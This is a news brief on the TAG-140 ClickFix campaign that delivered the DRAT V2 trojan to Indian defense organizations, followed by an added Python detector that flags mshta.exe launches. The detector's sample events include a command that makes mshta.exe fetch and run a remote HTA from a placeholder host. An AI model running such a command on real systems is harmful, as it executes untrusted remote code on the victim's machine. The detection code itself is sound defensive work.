Threat operation TAG-140, which has been associated with Pakistan-linked hacking groups Transparent Tribe and SideCopy, has deployed the significantly improved DRAT V2 remote access trojan in a social engineering attack campaign with ClickFix tactics aimed at Indian defense organizations, Cyber Security News reports.
Attackers used spear-phishing to lure targets into visiting a fake Indian Ministry of Defense press release portal with a link for March 2025 press releases. That link redirected to a specialized URI that hijacked the victim's clipboard, abused mshta.exe to execute a remote script, and then delivered the BroaderAspect loader, which in turn downloads the Delphi-based DRAT V2 malware, a report from Recorded Future's Insikt Group researchers showed. DRAT V2 not only allowed remote access but also enabled arbitrary shell command execution through its new "exec_this_comm" command, giving the operators more flexible post-exploitation options. Researchers also found that DRAT V2's TCP-based command-and-control protocol had been improved to support both ASCII and Unicode.
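The clipboard hijack in a ClickFix chain happens inside the browser and leaves no process event of its own; what a defender can see is the mshta.exe launch it tricks the user into triggering. The following is an added detection example, not code from Recorded Future or the article. It scores process-creation events (a Sysmon Event ID 1 style record reduced to parent image, image and command line) for mshta.exe invocations that fetch a remote script, and treats launch from explorer.exe (the Run-dialog path a ClickFix lure relies on) as an additional indicator. The sample events, the hostname `example.invalid` and the field names are constructed assumptions for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed field names, Sysmon-like)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry for the example; not observations from the report.
SAMPLE_EVENTS = [
    # ClickFix-style launch: Run dialog (explorer.exe parent) + remote .hta
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/press-release/march-2025.hta"),
    # Legitimate installer running a local HTA from its own directory
    ProcEvent(r"C:\Program Files\SomeVendor\setup.exe",
              r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\SomeVendor\installer.hta"'),
    # Unrelated process, should be ignored
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
]

# Remote script locations that mshta.exe will happily fetch and execute.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)


def is_image(path: str, name: str) -> bool:
    """Case-insensitive match on the executable's file name."""
    return path.lower().endswith("\\" + name.lower())


def classify(ev: ProcEvent) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one event.

    high   : mshta.exe with a remote URL on its command line
    medium : mshta.exe launched from explorer.exe without a URL
    info   : any other mshta.exe launch (worth logging, rarely malicious)
    benign : not mshta.exe at all
    """
    if not is_image(ev.image, "mshta.exe"):
        return "benign", []

    reasons: list[str] = []
    if URL_RE.search(ev.command_line):
        reasons.append("mshta.exe given a remote script URL")
    if is_image(ev.parent_image, "explorer.exe"):
        reasons.append("launched from explorer.exe (Run dialog / ClickFix pattern)")

    if any("remote script URL" in r for r in reasons):
        return "high", reasons
    if reasons:
        return "medium", reasons
    return "info", reasons


def triage(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Index every non-benign event with its severity, highest first."""
    order = {"high": 0, "medium": 1, "info": 2}
    hits = [(i, classify(ev)[0]) for i, ev in enumerate(events)]
    hits = [(i, sev) for i, sev in hits if sev != "benign"]
    return sorted(hits, key=lambda h: order[h[1]])


if __name__ == "__main__":
    for idx, sev in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{sev}] {ev.command_line}")
        for reason in classify(ev)[1]:
            print(f"    - {reason}")
```

The URL check alone is the high-confidence signal: a user typing a pasted `mshta https://...` line has no normal business reason to do so, whereas installers and enterprise tooling do launch local HTA files, which is why the second sample stays at "info" rather than firing. The explorer.exe parent is kept as a secondary indicator because it is what distinguishes a user-pasted Run-dialog command from a script or service spawning mshta.exe.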